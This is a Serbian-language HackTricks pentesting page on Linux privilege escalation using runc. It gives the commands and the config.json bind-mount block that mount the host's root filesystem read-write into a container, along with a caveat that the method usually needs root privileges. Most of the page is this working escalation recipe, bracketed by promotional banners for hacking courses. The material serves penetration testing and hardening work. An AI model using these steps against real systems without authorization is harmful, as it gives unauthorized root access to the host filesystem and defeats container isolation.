hacktricks/linux-hardening/privilege-escalation/runc-privilege-escalation.md
2024-02-10 13:11:20 +00:00

3.6 KiB

RunC Privilegija Eskalacija

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Osnovne informacije

Ako želite da saznate više o runc-u, proverite sledeću stranicu:

{% content-ref url="../../network-services-pentesting/2375-pentesting-docker.md" %} 2375-pentesting-docker.md {% endcontent-ref %}

PE

Ako otkrijete da je runc instaliran na hostu, možda ćete moći da pokrenete kontejner koji montira root / folder hosta.

runc -help #Get help and see if runc is intalled
runc spec #This will create the config.json file in your current folder

Inside the "mounts" section of the create config.json add the following lines:
{
"type": "bind",
"source": "/",
"destination": "/",
"options": [
"rbind",
"rw",
"rprivate"
]
},

#Once you have modified the config.json file, create the folder rootfs in the same directory
mkdir rootfs

# Finally, start the container
# The root folder is the one from the host
runc run demo

{% hint style="danger" %} Ovo neće uvek raditi jer je podrazumevana operacija runc-a pokretanje kao root, pa pokretanje kao neprivilegovan korisnik jednostavno ne može raditi (osim ako nemate konfiguraciju bez root-a). Stvaranje konfiguracije bez root-a podrazumevana nije generalno dobra ideja jer postoji dosta ograničenja unutar kontejnera bez root-a koja se ne primenjuju izvan kontejnera bez root-a. {% endhint %}

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u: